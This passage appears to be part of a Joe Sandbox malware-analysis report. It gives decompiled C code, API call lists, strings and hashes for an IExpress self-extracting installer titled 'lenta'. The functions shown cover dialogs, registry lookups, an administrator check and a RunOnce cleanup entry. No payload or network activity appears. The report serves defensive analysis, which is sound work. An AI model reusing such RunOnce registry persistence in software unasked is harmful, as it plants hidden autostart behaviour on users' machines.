                              								} else {
                              									_t54 = E010E67C9(_t74, _t74);
                              									_t49 = 0x190000;
                              									if(_t54 == 0) {
                              										goto L25;
                              									}
                              								}
                              								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                              								_t83 = _t52;
                              								LocalFree(_t80);
                              								_t39 = _t52;
                              							}
                              						}
                              					} else {
                              						if(E010E681F(_t67) == 0) {
                              							L4:
                              							_t64 = 0x10010;
                              						} else {
                              							_t66 = E010E67C9(0, 0);
                              							_t64 = 0x190010;
                              							if(_t66 == 0) {
                              								goto L4;
                              							}
                              						}
                              						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                              						L6:
                              						_t39 = _t44 | 0xffffffff;
                              					}
                              				}
                              				return E010E6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                              			}

                              APIs
                              • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                              • MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 010E45A3
                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 010E45E3
                              • LocalAlloc.KERNEL32(00000040,00000002), ref: 010E460D
                              • MessageBeep.USER32(00000000), ref: 010E4630
                              • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 010E4666
                              • LocalFree.KERNEL32(00000000), ref: 010E466F
                                • Part of subcall function 010E681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010E686E
                                • Part of subcall function 010E681F: GetSystemMetrics.USER32(0000004A), ref: 010E68A7
                                • Part of subcall function 010E681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010E68CC
                                • Part of subcall function 010E681F: RegQueryValueExA.ADVAPI32(?,010E1140,00000000,?,?,0000000C), ref: 010E68F4
                                • Part of subcall function 010E681F: RegCloseKey.ADVAPI32(?), ref: 010E6902
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                              • String ID: LoadString() Error. Could not load string resource.$lenta
                              • API String ID: 3244514340-1000497449
                              • Opcode ID: 2362a7b513661d46fbd15a98280cb5464b531f3bcd50bd5d1030893e623988fd
                              • Instruction ID: cb78bf52fc3f647615a0a77254566dad28d9f9eb6bceb1ac941b5de51c49496a
                              • Opcode Fuzzy Hash: 2362a7b513661d46fbd15a98280cb5464b531f3bcd50bd5d1030893e623988fd
                              • Instruction Fuzzy Hash: 0B510472A00215AFDB219E2ADC4CBAA7BE8EF49700F0441D9EDC9E7205DB36DD05CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E010E2773(CHAR* __ecx, char* _a4) {
                              				signed int _v8;
                              				char _v268;
                              				char _v269;
                              				CHAR* _v276;
                              				int _v280;
                              				void* _v284;
                              				int _v288;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t23;
                              				intOrPtr _t34;
                              				int _t45;
                              				int* _t50;
                              				CHAR* _t52;
                              				CHAR* _t61;
                              				char* _t62;
                              				int _t63;
                              				CHAR* _t64;
                              				signed int _t65;
                              
                              				_t52 = __ecx;
                              				_t23 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t23 ^ _t65;
                              				_t62 = _a4;
                              				_t50 = 0;
                              				_t61 = __ecx;
                              				_v276 = _t62;
                              				 *((char*)(__ecx)) = 0;
                              				if( *_t62 != 0x23) {
                              					_t63 = 0x104;
                              					goto L14;
                              				} else {
                              					_t64 = _t62 + 1;
                              					_v269 = CharUpperA( *_t64);
                              					_v276 = CharNextA(CharNextA(_t64));
                              					_t63 = 0x104;
                              					_t34 = _v269;
                              					if(_t34 == 0x53) {
                              						L14:
                              						GetSystemDirectoryA(_t61, _t63);
                              						goto L15;
                              					} else {
                              						if(_t34 == 0x57) {
                              							GetWindowsDirectoryA(_t61, 0x104);
                              							goto L16;
                              						} else {
                              							_push(_t52);
                              							_v288 = 0x104;
                              							E010E1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                              							_t59 = 0x104;
                              							E010E658A( &_v268, 0x104, _v276);
                              							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                              								L16:
                              								_t59 = _t63;
                              								E010E658A(_t61, _t63, _v276);
                              							} else {
                              								if(RegQueryValueExA(_v284, 0x10e1140, 0,  &_v280, _t61,  &_v288) == 0) {
                              									_t45 = _v280;
                              									if(_t45 != 2) {
                              										L9:
                              										if(_t45 == 1) {
                              											goto L10;
                              										}
                              									} else {
                              										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                              											_t45 = _v280;
                              											goto L9;
                              										} else {
                              											_t59 = 0x104;
                              											E010E1680(_t61, 0x104,  &_v268);
                              											L10:
                              											_t50 = 1;
                              										}
                              									}
                              								}
                              								RegCloseKey(_v284);
                              								L15:
                              								if(_t50 == 0) {
                              									goto L16;
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return E010E6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                              			}

                              APIs
                              • CharUpperA.USER32(9FDBF5B5,00000000,00000000,00000000), ref: 010E27A8
                              • CharNextA.USER32(0000054D), ref: 010E27B5
                              • CharNextA.USER32(00000000), ref: 010E27BC
                              • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2829
                              • RegQueryValueExA.ADVAPI32(?,010E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2852
                              • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2870
                              • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E28A0
                              • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 010E28AA
                              • GetSystemDirectoryA.KERNEL32 ref: 010E28B9
                              Strings
                              • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010E27E4
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                              • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                              • API String ID: 2659952014-2428544900
                              • Opcode ID: fb82445c74c5915658971610231e57e79724568a73cb72334f8445f8789be33c
                              • Instruction ID: a8898992a58c37551a9b7d7ca8384e5672c5a538c612aa0fffad0cb81eba2002
                              • Opcode Fuzzy Hash: fb82445c74c5915658971610231e57e79724568a73cb72334f8445f8789be33c
                              • Instruction Fuzzy Hash: C841BF71A01128AFDB659B669C89AFE7BFCEB59700F0040E9F5C9D7104CB758E858FA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 62%
                              			E010E2267() {
                              				signed int _v8;
                              				char _v268;
                              				char _v836;
                              				void* _v840;
                              				int _v844;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t19;
                              				intOrPtr _t33;
                              				void* _t38;
                              				intOrPtr* _t42;
                              				void* _t45;
                              				void* _t47;
                              				void* _t49;
                              				signed int _t51;
                              
                              				_t19 =  *0x10e8004; // 0x9fdbf5b5
                              				_t20 = _t19 ^ _t51;
                              				_v8 = _t19 ^ _t51;
                              				if( *0x10e8530 != 0) {
                              					_push(_t49);
                              					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                              						_push(_t38);
                              						_v844 = 0x238;
                              						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                              							_push(_t47);
                              							memset( &_v268, 0, 0x104);
                              							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                              								E010E658A( &_v268, 0x104, 0x10e1140);
                              							}
                              							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                              							E010E171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                              							_t42 =  &_v836;
                              							_t45 = _t42 + 1;
                              							_pop(_t47);
                              							do {
                              								_t33 =  *_t42;
                              								_t42 = _t42 + 1;
                              							} while (_t33 != 0);
                              							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                              						}
                              						_t20 = RegCloseKey(_v840);
                              						_pop(_t38);
                              					}
                              					_pop(_t49);
                              				}
                              				return E010E6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                              			}

                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 010E22A3
                              • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 010E22D8
                              • memset.MSVCRT ref: 010E22F5
                              • GetSystemDirectoryA.KERNEL32 ref: 010E2305
                              • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 010E236E
                              • RegCloseKey.ADVAPI32(?), ref: 010E237A
                              Strings
                              • wextract_cleanup0, xrefs: 010E227C, 010E22CD, 010E2363
                              • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 010E232D
                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 010E2321
                              • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 010E2299
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                              • API String ID: 3027380567-2036266374
                              • Opcode ID: 7d5921f6fcd41dde1b75c8ffcdd0617358a28680dd670a22d5f9bac8957245e1
                              • Instruction ID: 70048e7a767b88be1c9534ebe36549911bcb1f9ea0c9ffa9f52df40c3a7b32c9
                              • Opcode Fuzzy Hash: 7d5921f6fcd41dde1b75c8ffcdd0617358a28680dd670a22d5f9bac8957245e1
                              • Instruction Fuzzy Hash: 4331B671A00218AFDB719A67DC4CFEA7BFCEB14740F0401EAB58DAA005DA75AB84CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 87%
                              			E010E3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                              				void* _t8;
                              				void* _t11;
                              				void* _t15;
                              				struct HWND__* _t16;
                              				struct HWND__* _t33;
                              				struct HWND__* _t34;
                              
                              				_t8 = _a8 - 0xf;
                              				if(_t8 == 0) {
                              					if( *0x10e8590 == 0) {
                              						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                              						 *0x10e8590 = 1;
                              					}
                              					L13:
                              					return 0;
                              				}
                              				_t11 = _t8 - 1;
                              				if(_t11 == 0) {
                              					L7:
                              					_push(0);
                              					L8:
                              					EndDialog(_a4, ??);
                              					L9:
                              					return 1;
                              				}
                              				_t15 = _t11 - 0x100;
                              				if(_t15 == 0) {
                              					_t16 = GetDesktopWindow();
                              					_t33 = _a4;
                              					E010E43D0(_t33, _t16);
                              					SetDlgItemTextA(_t33, 0x834,  *0x10e8d4c);
                              					SetWindowTextA(_t33, "lenta");
                              					SetForegroundWindow(_t33);
                              					_t34 = GetDlgItem(_t33, 0x834);
                              					 *0x10e88b8 = GetWindowLongA(_t34, 0xfffffffc);
                              					SetWindowLongA(_t34, 0xfffffffc, E010E30C0);
                              					return 1;
                              				}
                              				if(_t15 != 1) {
                              					goto L13;
                              				}
                              				if(_a12 != 6) {
                              					if(_a12 != 7) {
                              						goto L9;
                              					}
                              					goto L7;
                              				}
                              				_push(1);
                              				goto L8;
                              			}










                              APIs
                              • EndDialog.USER32(?,00000000), ref: 010E313B
                              • GetDesktopWindow.USER32 ref: 010E314B
                              • SetDlgItemTextA.USER32(?,00000834), ref: 010E316A
                              • SetWindowTextA.USER32(?,lenta), ref: 010E3176
                              • SetForegroundWindow.USER32(?), ref: 010E317D
                              • GetDlgItem.USER32(?,00000834), ref: 010E3185
                              • GetWindowLongA.USER32(00000000,000000FC), ref: 010E3190
                              • SetWindowLongA.USER32(00000000,000000FC,010E30C0), ref: 010E31A3
                              • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 010E31CA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                              • String ID: lenta
                              • API String ID: 3785188418-2780258678
                              • Opcode ID: 7510c387d5a7dda01d7a4d5435f81e05a071290532b1a37e21b8795460e25e35
                              • Instruction ID: 868cca3ca0114521a9a515a1a90f6e8cb281d551122273dbe03f66e42256abe5
                              • Opcode Fuzzy Hash: 7510c387d5a7dda01d7a4d5435f81e05a071290532b1a37e21b8795460e25e35
                              • Instruction Fuzzy Hash: 9C119031644221FFDB315B2A9C0CB5A3EF4BB4AB61F014699F9E5AF184DB7AC141C741
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E010E468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                              				long _t4;
                              				void* _t11;
                              				CHAR* _t14;
                              				void* _t15;
                              				long _t16;
                              
                              				_t14 = __ecx;
                              				_t11 = __edx;
                              				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                              				_t16 = _t4;
                              				if(_t16 <= _a4 && _t11 != 0) {
                              					if(_t16 == 0) {
                              						L5:
                              						return 0;
                              					}
                              					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                              					if(_t15 == 0) {
                              						goto L5;
                              					}
                              					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                              					FreeResource(_t15);
                              					return _t16;
                              				}
                              				return _t4;
                              			}









                              APIs
                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                              • SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                              • LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                              • LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                              • memcpy_s.MSVCRT ref: 010E46E5
                              • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                              • String ID: TITLE$lenta
                              • API String ID: 3370778649-2035842925
                              • Opcode ID: bfc40be86e04a884c0228efe902c6a0e104b4eccbe080d047353a3c6f9c7120a
                              • Instruction ID: 0267dae0dde62032dd08ee2b89d130583609c4b169708d62b2e147a521e80183
                              • Opcode Fuzzy Hash: bfc40be86e04a884c0228efe902c6a0e104b4eccbe080d047353a3c6f9c7120a
                              • Instruction Fuzzy Hash: 17018F36340210BBE3301AAB6C0CF2B7EE8DB8DF61F054014FAC9DB144C966884487A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 57%
                              			E010E17EE(intOrPtr* __ecx) {
                              				signed int _v8;
                              				short _v12;
                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                              				_Unknown_base(*)()* _v20;
                              				void* _v24;
                              				intOrPtr* _v28;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t14;
                              				_Unknown_base(*)()* _t20;
                              				long _t28;
                              				void* _t35;
                              				struct HINSTANCE__* _t36;
                              				signed int _t38;
                              				intOrPtr* _t39;
                              
                              				_t14 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t14 ^ _t38;
                              				_v12 = 0x500;
                              				_t37 = __ecx;
                              				_v16.Value = 0;
                              				_v28 = __ecx;
                              				_t28 = 0;
                              				_t36 = LoadLibraryA("advapi32.dll");
                              				if(_t36 != 0) {
                              					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                              					_v20 = _t20;
                              					if(_t20 != 0) {
                              						 *_t37 = 0;
                              						_t28 = 1;
                              						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                              							_t37 = _t39;
                              							 *0x10ea288(0, _v24, _v28);
                              							_v20();
                              							if(_t39 != _t39) {
                              								asm("int 0x29");
                              							}
                              							FreeSid(_v24);
                              						}
                              					}
                              					FreeLibrary(_t36);
                              				}
                              				return E010E6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                              			}




















                              APIs
                              • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010E18DD), ref: 010E181A
                              • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010E182C
                              • AllocateAndInitializeSid.ADVAPI32(010E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010E18DD), ref: 010E1855
                              • FreeSid.ADVAPI32(?,?,?,?,010E18DD), ref: 010E1883
                              • FreeLibrary.KERNEL32(00000000,?,?,?,010E18DD), ref: 010E188A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                              • String ID: CheckTokenMembership$advapi32.dll
                              • API String ID: 4204503880-1888249752
                              • Opcode ID: 27369c98905bec81fbbe303482e1932502d8d483f20f4879374e915ae9e7cdb3
                              • Instruction ID: 4e0845ff00ce17e0037ad6bb8e5179883e3db37acc1bc3c7b70922bf7f5e1cef
                              • Opcode Fuzzy Hash: 27369c98905bec81fbbe303482e1932502d8d483f20f4879374e915ae9e7cdb3
                              • Instruction Fuzzy Hash: 52118431F00209EFDB149FA6DC4DABEBFF8EB48710F500169FA45E7240DA3599008790
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                              				void* _t7;
                              				void* _t11;
                              				struct HWND__* _t12;
                              				int _t22;
                              				struct HWND__* _t24;
                              
                              				_t7 = _a8 - 0x10;
                              				if(_t7 == 0) {
                              					EndDialog(_a4, 2);
                              					L11:
                              					return 1;
                              				}
                              				_t11 = _t7 - 0x100;
                              				if(_t11 == 0) {
                              					_t12 = GetDesktopWindow();
                              					_t24 = _a4;
                              					E010E43D0(_t24, _t12);
                              					SetWindowTextA(_t24, "lenta");
                              					SetDlgItemTextA(_t24, 0x838,  *0x10e9404);
                              					SetForegroundWindow(_t24);
                              					goto L11;
                              				}
                              				if(_t11 == 1) {
                              					_t22 = _a12;
                              					if(_t22 < 6) {
                              						goto L11;
                              					}
                              					if(_t22 <= 7) {
                              						L8:
                              						EndDialog(_a4, _t22);
                              						return 1;
                              					}
                              					if(_t22 != 0x839) {
                              						goto L11;
                              					}
                              					 *0x10e91dc = 1;
                              					goto L8;
                              				}
                              				return 0;
                              			}









                              APIs
                              • EndDialog.USER32(?,?), ref: 010E3490
                              • GetDesktopWindow.USER32 ref: 010E349A
                              • SetWindowTextA.USER32(?,lenta), ref: 010E34B2
                              • SetDlgItemTextA.USER32(?,00000838), ref: 010E34C4
                              • SetForegroundWindow.USER32(?), ref: 010E34CB
                              • EndDialog.USER32(?,00000002), ref: 010E34D8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Window$DialogText$DesktopForegroundItem
                              • String ID: lenta
                              • API String ID: 852535152-2780258678
                              • Opcode ID: e0e494a564392efdeb0ee77f5a618f2c314b7ed6ebcd682f261f99eac31af47a
                              • Instruction ID: a7e99374409ac04354dca54156f0a69900fde27d38e13228d6800bf226afe5fc
                              • Opcode Fuzzy Hash: e0e494a564392efdeb0ee77f5a618f2c314b7ed6ebcd682f261f99eac31af47a
                              • Instruction Fuzzy Hash: 1F01B1B9340114AFD72A5F6BD80C9AE3EE4FB49B51B008054FAC68F584CF36EA41CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 95%
                              			E010E2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                              				signed int _v8;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t16;
                              				int _t21;
                              				char _t32;
                              				intOrPtr _t34;
                              				char* _t38;
                              				char _t42;
                              				char* _t44;
                              				CHAR* _t52;
                              				intOrPtr* _t55;
                              				CHAR* _t59;
                              				void* _t62;
                              				CHAR* _t64;
                              				CHAR* _t65;
                              				signed int _t66;
                              
                              				_t60 = __edx;
                              				_t16 =  *0x10e8004; // 0x9fdbf5b5
                              				_t17 = _t16 ^ _t66;
                              				_v8 = _t16 ^ _t66;
                              				_t65 = _a4;
                              				_t44 = __edx;
                              				_t64 = __ecx;
                              				if( *((char*)(__ecx)) != 0) {
                              					GetModuleFileNameA( *0x10e9a3c,  &_v268, 0x104);
                              					while(1) {
                              						_t17 =  *_t64;
                              						if(_t17 == 0) {
                              							break;
                              						}
                              						_t21 = IsDBCSLeadByte(_t17);
                              						 *_t65 =  *_t64;
                              						if(_t21 != 0) {
                              							_t65[1] = _t64[1];
                              						}
                              						if( *_t64 != 0x23) {
                              							L19:
                              							_t65 = CharNextA(_t65);
                              						} else {
                              							_t64 = CharNextA(_t64);
                              							if(CharUpperA( *_t64) != 0x44) {
                              								if(CharUpperA( *_t64) != 0x45) {
                              									if( *_t64 == 0x23) {
                              										goto L19;
                              									}
                              								} else {
                              									E010E1680(_t65, E010E17C8(_t44, _t65),  &_v268);
                              									_t52 = _t65;
                              									_t14 =  &(_t52[1]); // 0x2
                              									_t60 = _t14;
                              									do {
                              										_t32 =  *_t52;
                              										_t52 =  &(_t52[1]);
                              									} while (_t32 != 0);
                              									goto L17;
                              								}
                              							} else {
                              								E010E65E8( &_v268);
                              								_t55 =  &_v268;
                              								_t62 = _t55 + 1;
                              								do {
                              									_t34 =  *_t55;
                              									_t55 = _t55 + 1;
                              								} while (_t34 != 0);
                              								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                              								if(_t38 != 0 &&  *_t38 == 0x5c) {
                              									 *_t38 = 0;
                              								}
                              								E010E1680(_t65, E010E17C8(_t44, _t65),  &_v268);
                              								_t59 = _t65;
                              								_t12 =  &(_t59[1]); // 0x2
                              								_t60 = _t12;
                              								do {
                              									_t42 =  *_t59;
                              									_t59 =  &(_t59[1]);
                              								} while (_t42 != 0);
                              								L17:
                              								_t65 =  &(_t65[_t52 - _t60]);
                              							}
                              						}
                              						_t64 = CharNextA(_t64);
                              					}
                              					 *_t65 = _t17;
                              				}
                              				return E010E6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                              			}























                              APIs
                              • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 010E2AE6
                              • IsDBCSLeadByte.KERNEL32(00000000), ref: 010E2AF2
                              • CharNextA.USER32(?), ref: 010E2B12
                              • CharUpperA.USER32 ref: 010E2B1E
                              • CharPrevA.USER32(?,?), ref: 010E2B55
                              • CharNextA.USER32(?), ref: 010E2BD4
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                              • String ID:
                              • API String ID: 571164536-0
                              • Opcode ID: fa29d2d9df99b0b41dabfe9086007ceda3444729974de75fbe9adb075061029f
                              • Instruction ID: 2f965684977c52619089d0fd4a2bd4a22441e97f96c73496c354bb14075210b0
                              • Opcode Fuzzy Hash: fa29d2d9df99b0b41dabfe9086007ceda3444729974de75fbe9adb075061029f
                              • Instruction Fuzzy Hash: 87412A346042459FDF669F399858AFE7FED9F56710F0440DAD8C287202DB7A8A86CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E010E43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                              				signed int _v8;
                              				struct tagRECT _v24;
                              				struct tagRECT _v40;
                              				struct HWND__* _v44;
                              				intOrPtr _v48;
                              				int _v52;
                              				intOrPtr _v56;
                              				int _v60;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t29;
                              				void* _t53;
                              				intOrPtr _t56;
                              				int _t59;
                              				struct HWND__* _t63;
                              				struct HWND__* _t67;
                              				struct HWND__* _t68;
                              				struct HDC__* _t69;
                              				int _t72;
                              				signed int _t74;
                              
                              				_t63 = __edx;
                              				_t29 =  *0x10e8004; // 0x9fdbf5b5
